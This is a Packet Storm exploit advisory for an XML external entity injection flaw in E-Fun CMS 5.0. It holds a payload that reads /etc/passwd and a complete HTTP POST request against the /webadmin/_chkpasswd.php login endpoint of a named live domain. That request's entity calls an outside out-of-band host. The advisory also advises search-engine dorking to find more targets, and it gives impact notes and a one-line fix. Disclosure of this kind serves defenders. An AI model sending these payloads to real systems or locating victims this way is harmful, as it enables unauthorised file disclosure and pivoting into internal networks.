what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

E-Fun CMS 5.0 XML Injection

E-Fun CMS 5.0 XML Injection
Posted Aug 15, 2023
Authored by indoushka

E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.

tags | exploit
SHA-256 | 5af873e10e8659ab07affe10868746b3fb4fc8bd88421a839e50cb3466940086

E-Fun CMS 5.0 XML Injection

Change Mirror Download
====================================================================================================================================
| # Title : E-Fun CMS V5.0 XML external entity injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://www.e-fun.com.tw/ |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities",
which instruct an XML processor to retrieve and perform
an inline include of XML located at a particular URI.
An external XML entity can be used to append or modify
the document type declaration (DTD) associated with an
XML document. An external XML entity can also be used
to include XML within the content of an XML document.

Now assume that the XML processor parses data originating
from a source under attacker control. Most of the time
the processor will not be validating, but it MAY include
the replacement text thus initiating an unexpected file
open operation, or HTTP transfer, or whatever system ids
the XML processor knows how to access.

below is a sample XML document that will use this functionality
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE indoushka [
<!ENTITY indoushka SYSTEM "file:///etc/passwd">
]>
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1
Content-type: text/xml
Host: landtop.com.tw
Content-Length: 175
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dt5fqyt [
<!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">
]>
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>


[+] Affected items :

/webadmin/
/webadmin/_chkpasswd.php
/webadmin/index.php

[+] The impact of this vulnerability :

Attacks can include disclosing local files,
which may contain sensitive data such as passwords
or private user data, using file: schemes or relative
paths in the system identifier. Since the attack occurs
relative to the application processing the XML document,
an attacker may use this trusted application to pivot
to other internal systems, possibly disclosing
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close